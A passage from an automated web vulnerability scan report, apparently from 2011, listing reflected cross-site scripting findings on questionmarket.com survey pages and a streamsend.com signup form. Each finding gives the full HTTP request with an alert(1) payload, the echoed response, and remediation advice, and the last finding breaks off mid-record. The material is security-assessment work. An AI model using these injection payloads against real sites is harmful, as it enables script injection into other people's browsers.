The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close28379\'%3balert(1)//48eea5b6e22&p2=Continue+to+your+destination HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:42:15 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:42:14 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 384
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close28379\\';alert(1)//48eea5b6e22</a>');
} else {
       document.write('<a href="http://a
...[SNIP]...

5.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The value of the p2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f855\'%3balert(1)//5a6ea17ffa6 was submitted in the p2 parameter. This input was echoed as 7f855\\';alert(1)//5a6ea17ffa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination7f855\'%3balert(1)//5a6ea17ffa6 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:42:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:42:47 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 384
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen/endsurvey_disq.php">Continue to your destination7f855\\';alert(1)//5a6ea17ffa6</a>
...[SNIP]...

5.14. http://amch.questionmarket.com/surveyf/nav.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73284"%3balert(1)//c45b9562948 was submitted in the code parameter. This input was echoed as 73284";alert(1)//c45b9562948 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=92273873284"%3balert(1)//c45b9562948&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:51 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270271; expires=Wed, 21 Sep 2011 18:37:51 GMT; path=/; domain=.questionmarket.com
Content-Length: 3868
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
pCountDown();
// Put together the URL for the survey

// Send the survey frame there
parent.survey.location = "http://survey.questionmarket.com/surv/913131/ai_start.php?site=10&from_aicode=92273873284";alert(1)//c45b9562948";}

// Invoked by the Certification button on the invitation page
function Certify(URL) {
popupWin = window.open(URL, 'Participant', 'location,scrollbars,width=450,height=300')
window.top.name = '
...[SNIP]...

5.15. http://amch.questionmarket.com/surveyf/nav.php [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The value of the link request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d421d'%3balert(1)//bcd6ca1703 was submitted in the link parameter. This input was echoed as d421d';alert(1)//bcd6ca1703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26d421d'%3balert(1)//bcd6ca1703&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:57 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270277; expires=Wed, 21 Sep 2011 18:37:57 GMT; path=/; domain=.questionmarket.com
Content-Length: 3863
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
;


function endSurvey() {
send();
}

// Where the browser should go after the survey is finished
var link = unescape('http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&d421d';alert(1)//bcd6ca1703');
// Where the browser came from before the survey
var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&';

// Skip the survey
function send() {
top.window.locati
...[SNIP]...

5.16. http://amch.questionmarket.com/surveyf/nav.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75c64'%3balert(1)//3e77d42b39d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75c64';alert(1)//3e77d42b39d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cak/75c64'%3balert(1)//3e77d42b39de%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:38:05 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270285; expires=Wed, 21 Sep 2011 18:38:05 GMT; path=/; domain=.questionmarket.com
Content-Length: 3865
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
.com/search/fast_search_recipes?search_term=xss sugar cake&');
// Where the browser came from before the survey
var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cak/75c64';alert(1)//3e77d42b39de&';

// Skip the survey
function send() {
top.window.location.href = link;    
}

// Send the browser back where it came from    
function sendToOrigin() {
top.window.location.href = origin;    
}

// Set up
...[SNIP]...

5.17. http://amch.questionmarket.com/surveyf/nav.php [orig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The value of the orig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6606f'%3balert(1)//c12f3c25a95 was submitted in the orig parameter. This input was echoed as 6606f';alert(1)//c12f3c25a95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%266606f'%3balert(1)//c12f3c25a95 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:38:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270280; expires=Wed, 21 Sep 2011 18:38:00 GMT; path=/; domain=.questionmarket.com
Content-Length: 3864
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
com/search/fast_search_recipes?search_term=xss sugar cake&');
// Where the browser came from before the survey
var origin = 'http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&6606f';alert(1)//c12f3c25a95';

// Skip the survey
function send() {
top.window.location.href = link;    
}

// Send the browser back where it came from    
function sendToOrigin() {
top.window.location.href = origin;    
}

// Set up t
...[SNIP]...

5.18. http://amch.questionmarket.com/surveyf/nav.php [survey_num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The value of the survey_num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf2f"%3balert(1)//828815a93a3 was submitted in the survey_num parameter. This input was echoed as ecf2f";alert(1)//828815a93a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131ecf2f"%3balert(1)//828815a93a3&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:49 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270269; expires=Wed, 21 Sep 2011 18:37:49 GMT; path=/; domain=.questionmarket.com
Content-Length: 3868
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
o_submit() {
// Don't count down
stopCountDown();
// Put together the URL for the survey

// Send the survey frame there
parent.survey.location = "http://survey.questionmarket.com/surv/913131ecf2f";alert(1)//828815a93a3/ai_start.php?site=10&from_aicode=922738";}

// Invoked by the Certification button on the invitation page
function Certify(URL) {
popupWin = window.open(URL, 'Participant', 'location,scrollbars,widt
...[SNIP]...

5.19. http://amch.questionmarket.com/surveyf/nav.php [survey_server parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The value of the survey_server request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b499"%3balert(1)//900ed15e804 was submitted in the survey_server parameter. This input was echoed as 1b499";alert(1)//900ed15e804 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com1b499"%3balert(1)//900ed15e804&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270268; expires=Wed, 21 Sep 2011 18:37:48 GMT; path=/; domain=.questionmarket.com
Content-Length: 3868
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...
n
function do_submit() {
// Don't count down
stopCountDown();
// Put together the URL for the survey

// Send the survey frame there
parent.survey.location = "http://survey.questionmarket.com1b499";alert(1)//900ed15e804/surv/913131/ai_start.php?site=10&from_aicode=922738";}

// Invoked by the Certification button on the invitation page
function Certify(URL) {
popupWin = window.open(URL, 'Participant', 'location,scr
...[SNIP]...

5.20. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bcompany%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The value of the person%5Bcompany%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a12"><script>alert(1)</script>9e198abd1c0 was submitted in the person%5Bcompany%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=42a12"><script>alert(1)</script>9e198abd1c0&commit=Sign+Up

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:39 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "1cf4c148e94db25c54b03c56dd91c804"
X-Runtime: 210
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3578
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...
<input id="person_company" name="person[company]" size="30" type="text" value="42a12"><script>alert(1)</script>9e198abd1c0" />
...[SNIP]...

5.21. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bemail_address%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The value of the person%5Bemail_address%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6907"><script>alert(1)</script>be1276185b1 was submitted in the person%5Bemail_address%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

